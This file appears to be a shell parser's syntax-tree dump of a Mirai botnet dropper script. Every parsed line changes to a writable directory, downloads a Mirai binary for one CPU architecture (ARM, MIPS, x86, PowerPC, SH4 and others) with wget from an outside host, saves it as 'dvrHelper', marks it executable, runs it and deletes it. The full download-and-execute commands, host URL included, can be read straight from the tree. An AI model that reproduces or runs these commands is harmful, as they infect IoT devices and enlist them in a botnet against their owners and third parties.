ListNode(lineno=2, pos=(12, 170), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 119), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 106), word='http://kysfag.3x.ro/bins/mirai.arm'),
    WordNode(lineno=2, pos=(107, 109), word='-O'),
    WordNode(lineno=2, pos=(110, 119), word='dvrHelper'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(119, 120)),
  CommandNode(lineno=2, pos=(121, 139), parts=[
    WordNode(lineno=2, pos=(121, 126), word='chmod'),
    WordNode(lineno=2, pos=(127, 129), word='+x'),
    WordNode(lineno=2, pos=(130, 139), word='dvrHelper'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(139, 140)),
  CommandNode(lineno=2, pos=(141, 152), parts=[
    WordNode(lineno=2, pos=(141, 152), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(152, 153)),
  CommandNode(lineno=2, pos=(154, 170), parts=[
    WordNode(lineno=2, pos=(154, 156), word='rm'),
    WordNode(lineno=2, pos=(157, 160), word='-rf'),
    WordNode(lineno=2, pos=(161, 170), word='dvrHelper'),
  ]),
])
ListNode(lineno=3, pos=(171, 330), parts=[
  CommandNode(lineno=3, pos=(171, 178), parts=[
    WordNode(lineno=3, pos=(171, 173), word='cd'),
    WordNode(lineno=3, pos=(174, 178), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(179, 181)),
  CommandNode(lineno=3, pos=(182, 193), parts=[
    WordNode(lineno=3, pos=(182, 184), word='cd'),
    WordNode(lineno=3, pos=(185, 193), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(194, 196)),
  CommandNode(lineno=3, pos=(197, 204), parts=[
    WordNode(lineno=3, pos=(197, 199), word='cd'),
    WordNode(lineno=3, pos=(200, 204), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(205, 207)),
  CommandNode(lineno=3, pos=(208, 216), parts=[
    WordNode(lineno=3, pos=(208, 210), word='cd'),
    WordNode(lineno=3, pos=(211, 216), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(217, 219)),
  CommandNode(lineno=3, pos=(220, 224), parts=[
    WordNode(lineno=3, pos=(220, 222), word='cd'),
    WordNode(lineno=3, pos=(223, 224), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(224, 225)),
  CommandNode(lineno=3, pos=(226, 279), parts=[
    WordNode(lineno=3, pos=(226, 230), word='wget'),
    WordNode(lineno=3, pos=(231, 266), word='http://kysfag.3x.ro/bins/mirai.m68k'),
    WordNode(lineno=3, pos=(267, 269), word='-O'),
    WordNode(lineno=3, pos=(270, 279), word='dvrHelper'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(279, 280)),
  CommandNode(lineno=3, pos=(281, 299), parts=[
    WordNode(lineno=3, pos=(281, 286), word='chmod'),
    WordNode(lineno=3, pos=(287, 289), word='+x'),
    WordNode(lineno=3, pos=(290, 299), word='dvrHelper'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(299, 300)),
  CommandNode(lineno=3, pos=(301, 312), parts=[
    WordNode(lineno=3, pos=(301, 312), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(312, 313)),
  CommandNode(lineno=3, pos=(314, 330), parts=[
    WordNode(lineno=3, pos=(314, 316), word='rm'),
    WordNode(lineno=3, pos=(317, 320), word='-rf'),
    WordNode(lineno=3, pos=(321, 330), word='dvrHelper'),
  ]),
])
ListNode(lineno=4, pos=(331, 490), parts=[
  CommandNode(lineno=4, pos=(331, 338), parts=[
    WordNode(lineno=4, pos=(331, 333), word='cd'),
    WordNode(lineno=4, pos=(334, 338), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(339, 341)),
  CommandNode(lineno=4, pos=(342, 353), parts=[
    WordNode(lineno=4, pos=(342, 344), word='cd'),
    WordNode(lineno=4, pos=(345, 353), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(354, 356)),
  CommandNode(lineno=4, pos=(357, 364), parts=[
    WordNode(lineno=4, pos=(357, 359), word='cd'),
    WordNode(lineno=4, pos=(360, 364), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(365, 367)),
  CommandNode(lineno=4, pos=(368, 376), parts=[
    WordNode(lineno=4, pos=(368, 370), word='cd'),
    WordNode(lineno=4, pos=(371, 376), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(377, 379)),
  CommandNode(lineno=4, pos=(380, 384), parts=[
    WordNode(lineno=4, pos=(380, 382), word='cd'),
    WordNode(lineno=4, pos=(383, 384), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(384, 385)),
  CommandNode(lineno=4, pos=(386, 439), parts=[
    WordNode(lineno=4, pos=(386, 390), word='wget'),
    WordNode(lineno=4, pos=(391, 426), word='http://kysfag.3x.ro/bins/mirai.mips'),
    WordNode(lineno=4, pos=(427, 429), word='-O'),
    WordNode(lineno=4, pos=(430, 439), word='dvrHelper'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(439, 440)),
  CommandNode(lineno=4, pos=(441, 459), parts=[
    WordNode(lineno=4, pos=(441, 446), word='chmod'),
    WordNode(lineno=4, pos=(447, 449), word='+x'),
    WordNode(lineno=4, pos=(450, 459), word='dvrHelper'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(459, 460)),
  CommandNode(lineno=4, pos=(461, 472), parts=[
    WordNode(lineno=4, pos=(461, 472), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(472, 473)),
  CommandNode(lineno=4, pos=(474, 490), parts=[
    WordNode(lineno=4, pos=(474, 476), word='rm'),
    WordNode(lineno=4, pos=(477, 480), word='-rf'),
    WordNode(lineno=4, pos=(481, 490), word='dvrHelper'),
  ]),
])
ListNode(lineno=5, pos=(491, 650), parts=[
  CommandNode(lineno=5, pos=(491, 498), parts=[
    WordNode(lineno=5, pos=(491, 493), word='cd'),
    WordNode(lineno=5, pos=(494, 498), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(499, 501)),
  CommandNode(lineno=5, pos=(502, 513), parts=[
    WordNode(lineno=5, pos=(502, 504), word='cd'),
    WordNode(lineno=5, pos=(505, 513), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(514, 516)),
  CommandNode(lineno=5, pos=(517, 524), parts=[
    WordNode(lineno=5, pos=(517, 519), word='cd'),
    WordNode(lineno=5, pos=(520, 524), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(525, 527)),
  CommandNode(lineno=5, pos=(528, 536), parts=[
    WordNode(lineno=5, pos=(528, 530), word='cd'),
    WordNode(lineno=5, pos=(531, 536), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(537, 539)),
  CommandNode(lineno=5, pos=(540, 544), parts=[
    WordNode(lineno=5, pos=(540, 542), word='cd'),
    WordNode(lineno=5, pos=(543, 544), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(544, 545)),
  CommandNode(lineno=5, pos=(546, 599), parts=[
    WordNode(lineno=5, pos=(546, 550), word='wget'),
    WordNode(lineno=5, pos=(551, 586), word='http://kysfag.3x.ro/bins/mirai.mpsl'),
    WordNode(lineno=5, pos=(587, 589), word='-O'),
    WordNode(lineno=5, pos=(590, 599), word='dvrHelper'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(599, 600)),
  CommandNode(lineno=5, pos=(601, 619), parts=[
    WordNode(lineno=5, pos=(601, 606), word='chmod'),
    WordNode(lineno=5, pos=(607, 609), word='+x'),
    WordNode(lineno=5, pos=(610, 619), word='dvrHelper'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(619, 620)),
  CommandNode(lineno=5, pos=(621, 632), parts=[
    WordNode(lineno=5, pos=(621, 632), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(632, 633)),
  CommandNode(lineno=5, pos=(634, 650), parts=[
    WordNode(lineno=5, pos=(634, 636), word='rm'),
    WordNode(lineno=5, pos=(637, 640), word='-rf'),
    WordNode(lineno=5, pos=(641, 650), word='dvrHelper'),
  ]),
])
ListNode(lineno=6, pos=(651, 809), parts=[
  CommandNode(lineno=6, pos=(651, 658), parts=[
    WordNode(lineno=6, pos=(651, 653), word='cd'),
    WordNode(lineno=6, pos=(654, 658), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(659, 661)),
  CommandNode(lineno=6, pos=(662, 673), parts=[
    WordNode(lineno=6, pos=(662, 664), word='cd'),
    WordNode(lineno=6, pos=(665, 673), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(674, 676)),
  CommandNode(lineno=6, pos=(677, 684), parts=[
    WordNode(lineno=6, pos=(677, 679), word='cd'),
    WordNode(lineno=6, pos=(680, 684), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(685, 687)),
  CommandNode(lineno=6, pos=(688, 696), parts=[
    WordNode(lineno=6, pos=(688, 690), word='cd'),
    WordNode(lineno=6, pos=(691, 696), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(697, 699)),
  CommandNode(lineno=6, pos=(700, 704), parts=[
    WordNode(lineno=6, pos=(700, 702), word='cd'),
    WordNode(lineno=6, pos=(703, 704), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(704, 705)),
  CommandNode(lineno=6, pos=(706, 758), parts=[
    WordNode(lineno=6, pos=(706, 710), word='wget'),
    WordNode(lineno=6, pos=(711, 745), word='http://kysfag.3x.ro/bins/mirai.x86'),
    WordNode(lineno=6, pos=(746, 748), word='-O'),
    WordNode(lineno=6, pos=(749, 758), word='dvrHelper'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(758, 759)),
  CommandNode(lineno=6, pos=(760, 778), parts=[
    WordNode(lineno=6, pos=(760, 765), word='chmod'),
    WordNode(lineno=6, pos=(766, 768), word='+x'),
    WordNode(lineno=6, pos=(769, 778), word='dvrHelper'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(778, 779)),
  CommandNode(lineno=6, pos=(780, 791), parts=[
    WordNode(lineno=6, pos=(780, 791), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(791, 792)),
  CommandNode(lineno=6, pos=(793, 809), parts=[
    WordNode(lineno=6, pos=(793, 795), word='rm'),
    WordNode(lineno=6, pos=(796, 799), word='-rf'),
    WordNode(lineno=6, pos=(800, 809), word='dvrHelper'),
  ]),
])
ListNode(lineno=7, pos=(810, 968), parts=[
  CommandNode(lineno=7, pos=(810, 817), parts=[
    WordNode(lineno=7, pos=(810, 812), word='cd'),
    WordNode(lineno=7, pos=(813, 817), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(818, 820)),
  CommandNode(lineno=7, pos=(821, 832), parts=[
    WordNode(lineno=7, pos=(821, 823), word='cd'),
    WordNode(lineno=7, pos=(824, 832), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(833, 835)),
  CommandNode(lineno=7, pos=(836, 843), parts=[
    WordNode(lineno=7, pos=(836, 838), word='cd'),
    WordNode(lineno=7, pos=(839, 843), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(844, 846)),
  CommandNode(lineno=7, pos=(847, 855), parts=[
    WordNode(lineno=7, pos=(847, 849), word='cd'),
    WordNode(lineno=7, pos=(850, 855), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(856, 858)),
  CommandNode(lineno=7, pos=(859, 863), parts=[
    WordNode(lineno=7, pos=(859, 861), word='cd'),
    WordNode(lineno=7, pos=(862, 863), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(863, 864)),
  CommandNode(lineno=7, pos=(865, 917), parts=[
    WordNode(lineno=7, pos=(865, 869), word='wget'),
    WordNode(lineno=7, pos=(870, 904), word='http://kysfag.3x.ro/bins/mirai.spc'),
    WordNode(lineno=7, pos=(905, 907), word='-O'),
    WordNode(lineno=7, pos=(908, 917), word='dvrHelper'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(917, 918)),
  CommandNode(lineno=7, pos=(919, 937), parts=[
    WordNode(lineno=7, pos=(919, 924), word='chmod'),
    WordNode(lineno=7, pos=(925, 927), word='+x'),
    WordNode(lineno=7, pos=(928, 937), word='dvrHelper'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(937, 938)),
  CommandNode(lineno=7, pos=(939, 950), parts=[
    WordNode(lineno=7, pos=(939, 950), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(950, 951)),
  CommandNode(lineno=7, pos=(952, 968), parts=[
    WordNode(lineno=7, pos=(952, 954), word='rm'),
    WordNode(lineno=7, pos=(955, 958), word='-rf'),
    WordNode(lineno=7, pos=(959, 968), word='dvrHelper'),
  ]),
])
ListNode(lineno=8, pos=(969, 1128), parts=[
  CommandNode(lineno=8, pos=(969, 976), parts=[
    WordNode(lineno=8, pos=(969, 971), word='cd'),
    WordNode(lineno=8, pos=(972, 976), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(977, 979)),
  CommandNode(lineno=8, pos=(980, 991), parts=[
    WordNode(lineno=8, pos=(980, 982), word='cd'),
    WordNode(lineno=8, pos=(983, 991), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(992, 994)),
  CommandNode(lineno=8, pos=(995, 1002), parts=[
    WordNode(lineno=8, pos=(995, 997), word='cd'),
    WordNode(lineno=8, pos=(998, 1002), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1003, 1005)),
  CommandNode(lineno=8, pos=(1006, 1014), parts=[
    WordNode(lineno=8, pos=(1006, 1008), word='cd'),
    WordNode(lineno=8, pos=(1009, 1014), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1015, 1017)),
  CommandNode(lineno=8, pos=(1018, 1022), parts=[
    WordNode(lineno=8, pos=(1018, 1020), word='cd'),
    WordNode(lineno=8, pos=(1021, 1022), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1022, 1023)),
  CommandNode(lineno=8, pos=(1024, 1077), parts=[
    WordNode(lineno=8, pos=(1024, 1028), word='wget'),
    WordNode(lineno=8, pos=(1029, 1064), word='http://kysfag.3x.ro/bins/mirai.arm7'),
    WordNode(lineno=8, pos=(1065, 1067), word='-O'),
    WordNode(lineno=8, pos=(1068, 1077), word='dvrHelper'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1077, 1078)),
  CommandNode(lineno=8, pos=(1079, 1097), parts=[
    WordNode(lineno=8, pos=(1079, 1084), word='chmod'),
    WordNode(lineno=8, pos=(1085, 1087), word='+x'),
    WordNode(lineno=8, pos=(1088, 1097), word='dvrHelper'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1097, 1098)),
  CommandNode(lineno=8, pos=(1099, 1110), parts=[
    WordNode(lineno=8, pos=(1099, 1110), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1110, 1111)),
  CommandNode(lineno=8, pos=(1112, 1128), parts=[
    WordNode(lineno=8, pos=(1112, 1114), word='rm'),
    WordNode(lineno=8, pos=(1115, 1118), word='-rf'),
    WordNode(lineno=8, pos=(1119, 1128), word='dvrHelper'),
  ]),
])
ListNode(lineno=9, pos=(1129, 1289), parts=[
  CommandNode(lineno=9, pos=(1129, 1136), parts=[
    WordNode(lineno=9, pos=(1129, 1131), word='cd'),
    WordNode(lineno=9, pos=(1132, 1136), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1137, 1139)),
  CommandNode(lineno=9, pos=(1140, 1151), parts=[
    WordNode(lineno=9, pos=(1140, 1142), word='cd'),
    WordNode(lineno=9, pos=(1143, 1151), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1152, 1154)),
  CommandNode(lineno=9, pos=(1155, 1162), parts=[
    WordNode(lineno=9, pos=(1155, 1157), word='cd'),
    WordNode(lineno=9, pos=(1158, 1162), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1163, 1165)),
  CommandNode(lineno=9, pos=(1166, 1174), parts=[
    WordNode(lineno=9, pos=(1166, 1168), word='cd'),
    WordNode(lineno=9, pos=(1169, 1174), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1175, 1177)),
  CommandNode(lineno=9, pos=(1178, 1182), parts=[
    WordNode(lineno=9, pos=(1178, 1180), word='cd'),
    WordNode(lineno=9, pos=(1181, 1182), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1182, 1183)),
  CommandNode(lineno=9, pos=(1184, 1238), parts=[
    WordNode(lineno=9, pos=(1184, 1188), word='wget'),
    WordNode(lineno=9, pos=(1189, 1225), word='http://kysfag.3x.ro/bins/mirai.arm5n'),
    WordNode(lineno=9, pos=(1226, 1228), word='-O'),
    WordNode(lineno=9, pos=(1229, 1238), word='dvrHelper'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1238, 1239)),
  CommandNode(lineno=9, pos=(1240, 1258), parts=[
    WordNode(lineno=9, pos=(1240, 1245), word='chmod'),
    WordNode(lineno=9, pos=(1246, 1248), word='+x'),
    WordNode(lineno=9, pos=(1249, 1258), word='dvrHelper'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1258, 1259)),
  CommandNode(lineno=9, pos=(1260, 1271), parts=[
    WordNode(lineno=9, pos=(1260, 1271), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1271, 1272)),
  CommandNode(lineno=9, pos=(1273, 1289), parts=[
    WordNode(lineno=9, pos=(1273, 1275), word='rm'),
    WordNode(lineno=9, pos=(1276, 1279), word='-rf'),
    WordNode(lineno=9, pos=(1280, 1289), word='dvrHelper'),
  ]),
])
ListNode(lineno=10, pos=(1290, 1448), parts=[
  CommandNode(lineno=10, pos=(1290, 1297), parts=[
    WordNode(lineno=10, pos=(1290, 1292), word='cd'),
    WordNode(lineno=10, pos=(1293, 1297), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1298, 1300)),
  CommandNode(lineno=10, pos=(1301, 1312), parts=[
    WordNode(lineno=10, pos=(1301, 1303), word='cd'),
    WordNode(lineno=10, pos=(1304, 1312), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1313, 1315)),
  CommandNode(lineno=10, pos=(1316, 1323), parts=[
    WordNode(lineno=10, pos=(1316, 1318), word='cd'),
    WordNode(lineno=10, pos=(1319, 1323), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1324, 1326)),
  CommandNode(lineno=10, pos=(1327, 1335), parts=[
    WordNode(lineno=10, pos=(1327, 1329), word='cd'),
    WordNode(lineno=10, pos=(1330, 1335), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1336, 1338)),
  CommandNode(lineno=10, pos=(1339, 1343), parts=[
    WordNode(lineno=10, pos=(1339, 1341), word='cd'),
    WordNode(lineno=10, pos=(1342, 1343), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1343, 1344)),
  CommandNode(lineno=10, pos=(1345, 1397), parts=[
    WordNode(lineno=10, pos=(1345, 1349), word='wget'),
    WordNode(lineno=10, pos=(1350, 1384), word='http://kysfag.3x.ro/bins/mirai.arm'),
    WordNode(lineno=10, pos=(1385, 1387), word='-O'),
    WordNode(lineno=10, pos=(1388, 1397), word='dvrHelper'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1397, 1398)),
  CommandNode(lineno=10, pos=(1399, 1417), parts=[
    WordNode(lineno=10, pos=(1399, 1404), word='chmod'),
    WordNode(lineno=10, pos=(1405, 1407), word='+x'),
    WordNode(lineno=10, pos=(1408, 1417), word='dvrHelper'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1417, 1418)),
  CommandNode(lineno=10, pos=(1419, 1430), parts=[
    WordNode(lineno=10, pos=(1419, 1430), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1430, 1431)),
  CommandNode(lineno=10, pos=(1432, 1448), parts=[
    WordNode(lineno=10, pos=(1432, 1434), word='rm'),
    WordNode(lineno=10, pos=(1435, 1438), word='-rf'),
    WordNode(lineno=10, pos=(1439, 1448), word='dvrHelper'),
  ]),
])
ListNode(lineno=11, pos=(1449, 1607), parts=[
  CommandNode(lineno=11, pos=(1449, 1456), parts=[
    WordNode(lineno=11, pos=(1449, 1451), word='cd'),
    WordNode(lineno=11, pos=(1452, 1456), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1457, 1459)),
  CommandNode(lineno=11, pos=(1460, 1471), parts=[
    WordNode(lineno=11, pos=(1460, 1462), word='cd'),
    WordNode(lineno=11, pos=(1463, 1471), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1472, 1474)),
  CommandNode(lineno=11, pos=(1475, 1482), parts=[
    WordNode(lineno=11, pos=(1475, 1477), word='cd'),
    WordNode(lineno=11, pos=(1478, 1482), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1483, 1485)),
  CommandNode(lineno=11, pos=(1486, 1494), parts=[
    WordNode(lineno=11, pos=(1486, 1488), word='cd'),
    WordNode(lineno=11, pos=(1489, 1494), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1495, 1497)),
  CommandNode(lineno=11, pos=(1498, 1502), parts=[
    WordNode(lineno=11, pos=(1498, 1500), word='cd'),
    WordNode(lineno=11, pos=(1501, 1502), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1502, 1503)),
  CommandNode(lineno=11, pos=(1504, 1556), parts=[
    WordNode(lineno=11, pos=(1504, 1508), word='wget'),
    WordNode(lineno=11, pos=(1509, 1543), word='http://kysfag.3x.ro/bins/mirai.ppc'),
    WordNode(lineno=11, pos=(1544, 1546), word='-O'),
    WordNode(lineno=11, pos=(1547, 1556), word='dvrHelper'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1556, 1557)),
  CommandNode(lineno=11, pos=(1558, 1576), parts=[
    WordNode(lineno=11, pos=(1558, 1563), word='chmod'),
    WordNode(lineno=11, pos=(1564, 1566), word='+x'),
    WordNode(lineno=11, pos=(1567, 1576), word='dvrHelper'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1576, 1577)),
  CommandNode(lineno=11, pos=(1578, 1589), parts=[
    WordNode(lineno=11, pos=(1578, 1589), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1589, 1590)),
  CommandNode(lineno=11, pos=(1591, 1607), parts=[
    WordNode(lineno=11, pos=(1591, 1593), word='rm'),
    WordNode(lineno=11, pos=(1594, 1597), word='-rf'),
    WordNode(lineno=11, pos=(1598, 1607), word='dvrHelper'),
  ]),
])
ListNode(lineno=12, pos=(1608, 1766), parts=[
  CommandNode(lineno=12, pos=(1608, 1615), parts=[
    WordNode(lineno=12, pos=(1608, 1610), word='cd'),
    WordNode(lineno=12, pos=(1611, 1615), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1616, 1618)),
  CommandNode(lineno=12, pos=(1619, 1630), parts=[
    WordNode(lineno=12, pos=(1619, 1621), word='cd'),
    WordNode(lineno=12, pos=(1622, 1630), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1631, 1633)),
  CommandNode(lineno=12, pos=(1634, 1641), parts=[
    WordNode(lineno=12, pos=(1634, 1636), word='cd'),
    WordNode(lineno=12, pos=(1637, 1641), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1642, 1644)),
  CommandNode(lineno=12, pos=(1645, 1653), parts=[
    WordNode(lineno=12, pos=(1645, 1647), word='cd'),
    WordNode(lineno=12, pos=(1648, 1653), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1654, 1656)),
  CommandNode(lineno=12, pos=(1657, 1661), parts=[
    WordNode(lineno=12, pos=(1657, 1659), word='cd'),
    WordNode(lineno=12, pos=(1660, 1661), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1661, 1662)),
  CommandNode(lineno=12, pos=(1663, 1715), parts=[
    WordNode(lineno=12, pos=(1663, 1667), word='wget'),
    WordNode(lineno=12, pos=(1668, 1702), word='http://kysfag.3x.ro/bins/mirai.sh4'),
    WordNode(lineno=12, pos=(1703, 1705), word='-O'),
    WordNode(lineno=12, pos=(1706, 1715), word='dvrHelper'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1715, 1716)),
  CommandNode(lineno=12, pos=(1717, 1735), parts=[
    WordNode(lineno=12, pos=(1717, 1722), word='chmod'),
    WordNode(lineno=12, pos=(1723, 1725), word='+x'),
    WordNode(lineno=12, pos=(1726, 1735), word='dvrHelper'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1735, 1736)),
  CommandNode(lineno=12, pos=(1737, 1748), parts=[
    WordNode(lineno=12, pos=(1737, 1748), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1748, 1749)),
  CommandNode(lineno=12, pos=(1750, 1766), parts=[
    WordNode(lineno=12, pos=(1750, 1752), word='rm'),
    WordNode(lineno=12, pos=(1753, 1756), word='-rf'),
    WordNode(lineno=12, pos=(1757, 1766), word='dvrHelper'),
  ]),
])
